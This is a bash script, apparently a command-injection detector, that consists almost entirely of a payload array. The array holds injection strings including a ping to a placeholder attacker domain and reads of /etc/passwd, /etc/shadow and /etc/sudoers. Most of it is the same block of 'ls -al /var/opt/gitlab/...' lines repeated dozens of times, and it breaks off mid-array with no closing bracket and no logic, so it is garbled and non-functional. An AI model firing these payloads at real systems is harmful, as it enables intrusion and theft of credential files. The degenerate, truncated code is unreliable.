#!/bin/bash
# This is a comment

# Define color codes
green='\033[0;32m'
red='\033[0;31m'
yellow='\033[0;33m'
nc='\033[0m' # No Color

# Function to perform Command Injection detection
detect_command_injection() {
    echo "Detecting Command Injection vulnerabilities..."
    # Define Command Injection payloads
    payloads=("ping -c 1 attacker-controlled-domain.com" "echo 'Vulnerable' > /tmp/command_injection_vulnerable.txt"
            "ls /etc" "uname -a"
            "ping -c 1 attacker-controlled-domain.com"
            "echo 'Vulnerable' > /tmp/command_injection_vulnerable.txt"
            "ls /etc"
            "uname -a"
            "cat /proc/version"
            "cat /proc/cpuinfo"
            "lsmod"
            "ifconfig -a"
            "hostname -i"
            "route -n"
            "cat /etc/resolv.conf"
            "cat /etc/hosts"
            "cat /etc/issue"
            "cat /etc/issue.net"
            "cat /etc/network/interfaces"
            "cat /etc/passwd"
            "cat /etc/shadow"
            "cat /etc/group"
            "cat /etc/sudoers"
            "ls -al /home"
            "ls -al /root"
            "ls -al /var/www"
            "ls -al /tmp"
            "ls -al /var/log"
            "ls -al /var/run"
            "ls -al /var/lock"
            "ls -al /var/spool"
            "ls -al /var/mail"
            "ls -al /var/backups"
            "ls -al /var/cache"
            "ls -al /var/opt"
            "ls -al /var/lib"
            "ls -al /var/snap"
            "ls -al /var/tmp"
            "ls -al /var/crash"
            "ls -al /var/games"
            "ls -al /var/local"
            "ls -al /var/metrics"
            "ls -al /var/opt"
            "ls -al /var/run"
            "ls -al /var/spool"
            "ls -al /var/yp"
            "ls -al /var/opt"
            "ls -al /var/lib"
            "ls -al /var/lib/dpkg"
            "ls -al /var/lib/mysql"
            "ls -al /var/lib/php"
            "ls -al /var/lib/snapd"
            "ls -al /var/log"
            "ls -al /var/log/apache2"
            "ls -al /var/log/nginx"
            "ls -al /var/log/apache"
            "ls -al /var/log/mysql"
            "ls -al /var/log/php"
            "ls -al /var/log/samba"
            "ls -al /var/log/ssh"
            "ls -al /var/log/vsftpd.log"
            "ls -al /var/mail"
            "ls -al /var/spool/mail"
            "ls -al /var/opt/gitlab"
            "ls -al /var/opt/gitlab/nginx"
            "ls -al /var/opt/gitlab/nginx/html"
            "ls -al /var/opt/gitlab/nginx/logs"
            "ls -al /var/opt/gitlab/nginx/conf"
            "ls -al /var/opt/gitlab/nginx/conf.d"
            "ls -al /var/opt/gitlab/nginx/sites-available"
            "ls -al /var/opt/gitlab/nginx/sites-enabled"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/logrotate"
            "ls -al /var/opt/gitlab/geoip"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/postgres"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-ci"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
            "ls -al /var/opt/gitlab/gitlab-workhorse"
            "ls -al /var/opt/gitlab/monitor"
            "ls -al /var/opt/gitlab/ops"
            "ls -al /var/opt/gitlab/prometheus"
            "ls -al /var/opt/gitlab/redis"
            "ls -al /var/opt/gitlab/satellites"
            "ls -al /var/opt/gitlab/ssh"
            "ls -al /var/opt/gitlab/trash"
            "ls -al /var/opt/gitlab/unicorn"
            "ls -al /var/opt/gitlab/puma"
            "ls -al /var/opt/gitlab/registry"
            "ls -al /var/opt/gitlab/health-check"
            "ls -al /var/opt/gitlab/ci"
            "ls -al /var/opt/gitlab/node-exporter"
            "ls -al /var/opt/gitlab/gitlab-exporter"
            "ls -al /var/opt/gitlab/gitlab-metrics"
            "ls -al /var/opt/gitlab/gitlab-monitor"
            "ls -al /var/opt/gitlab/gitlab-ctl"
            "ls -al /var/opt/gitlab/gitlab-mattermost"
            "ls -al /var/opt/gitlab/backup"
            "ls -al /var/opt/gitlab/gitlab-redis"
            "ls -al /var/opt/gitlab/gitlab-rails"
            "ls -al /var/opt/gitlab/letsencrypt"
            "ls -al /var/opt/gitlab/gitlab-pages"
            "ls -al /var/opt/gitlab/gitlab-registry"
            "ls -al /var/opt/gitlab/gitlab-shell"
